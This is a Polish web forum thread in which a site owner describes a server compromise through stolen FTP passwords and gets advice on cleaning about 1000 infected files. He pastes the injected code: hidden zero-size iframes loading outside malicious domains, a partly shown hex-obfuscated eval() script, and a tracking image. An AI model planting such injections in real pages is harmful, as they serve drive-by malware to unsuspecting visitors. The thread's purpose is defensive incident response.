Zaatakowali serwer Opcje

[gargamel]

Nie bardzo wiem gdzie ten temat wcisnąć, w razie czego proszę o przeniesienie.

Parę dni temu ktoś wbił się nam na serwer. Wg administratorów serwera, zostały wykradzione hasła ftp...
W 2 plikach pojawił się kod:

[HTML] pobierz, plaintext 
<iframe border="0" frameborder="no" src="http://nudeteens.in/3/index.php" width="0" height="0">
<!-- [ c2d6386914320468a51227393bb2d185 ] -->
<script>eval('\x66\x75\x6e\x63\x74\x69\x6f
x30\x32\x25\x30\x32\x25\x31\x39\x25\x37\x66\x25\x33\x39\x25\x32\x33\x25\x37\x37\
x25\x33\x32\x25\x36\x30\x25\x32\x61\x25\x36\x66\x25\x36\x34\x25\x36\x39
\x25\x33\x33\x25\x36\x30\x25\x31\x61\x25\x36\x65\x25\x31\x30\x25\x33\x33\x25\x30
\x37\x25\x34\x63\x25\x30\x39\x25\x33\x65\x25\x36\x32\x25\x33\x38\x25\x33
[... tu cała masa linii tego typu ...]
\x32\x25\x33\x38\x25\x31\x65\x25\x36\x66\x25\x35\x32\x25\x31\x39\x25\x31\x37\x25
\x31\x31\x25\x33\x66\x25\x33\x31\x25\x33\x31\x25\x34\x65\x25\x35\x65\x25
\x37\x38\x25\x36\x35\x25\x31\x61\x25\x33\x63\x25\x37\x31\x25\x36\x65\x25\x33\x62
\x25\x32\x66\x25\x32\x32\x25\x33\x64\x25\x31\x62\x25\x31\x30\x25\x33\x61
\x25\x37\x34\x25\x37\x61\x25\x37\x66\x27\x29\x3b');
</script><!-- end -->
<iframe src='http://fleyk.biz/ce/index.php ' width='0' height='0'  border='0'></iframe>
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16815234">
[HTML] pobierz, plaintext 

Ponadto do praktycznie wszystkich indexów została doklejona ostatnia linijka powyższego kodu, tuż za </html> pojawiło się

[HTML] pobierz, plaintext 
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16815234">
[HTML] pobierz, plaintext 

A więc pakowało jakiś wredny skrypt na stronę.
Miał może ktoś coś podobnego i wie co taki wirus robi?
I czy poza zawirusowanym kompem kogoś kto loguje się na ftp, są jakieś inne metody wykradania haseł?

[trucksweb]

metod jest tyle co hakerow.

zeskanuj kompa dobrym antywirem i zapusc combofixa.
Potem zmien dane do wszystkich ftp - na ciag alfanumeryczny ze znakami specjalnymi
Potem wez logi od dostawcy hostingu i je przeanalizuj - zobaczysz kto i kiedy sie logowal, co odwiedzal
Na koncu wywal TC - zainstaluj winscp - i daj zapisywanie hasel w rejestrze (o dziwo bezpieczniejsze niz pliki z TC)

ps. ja tez mialem taki atak 5-6lat temu. do dzis mam spokoj
i nie oznacza to ze dokonano dostepu przez FTP. sprawdz ustawienia skryptow, uprawnienia do katalogow - jakos musieli wgrac plik ktory dopisywal linijki do wszystkich innych plikow.

[gargamel]

Hasła oczywiście pozmieniane i wszystko zabezpieczone...

Teraz jest tylko problem, bo około 1000 plików ma doklejony ten skrypt..
Macie może jakiś pomysł jak można to z tych plików wywalić inną metodą niż ręczną?

[mat-bi]

Z tym to cakiem łatwe - robisz skrypt, który wczytuje wszystkie pliki w danym katalogu, potem za pomocą, chyba nawet wystarczy, str_replace zmieniasz te znaki na pusty string, zapisujesz i voila

[gargamel]

O tym właśnie myślałem, zastanawiałem się tylko czy przy takiej ilości plików to zda egzamin...
Tu nie koniecznie str_replace, bo jeśli chodzi o kod:

[HTML] pobierz, plaintext 
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16815234">
[HTML] pobierz, plaintext 

to na każdej stronie jest inne id, więc pokombinuję z preg_replace...

Edit:

Przekopałem google i to znalazłem:http://blog.unmaskparasites.com/2011/05/05...search-results/ Może komuś kiedyś się przyda ten link.

Wyszło na to że edycja wcześniej wspomnianych plików jest moim najmniejszym problemem...

Pozdro!

Ten post edytował gargamel 12.05.2011, 00:28:59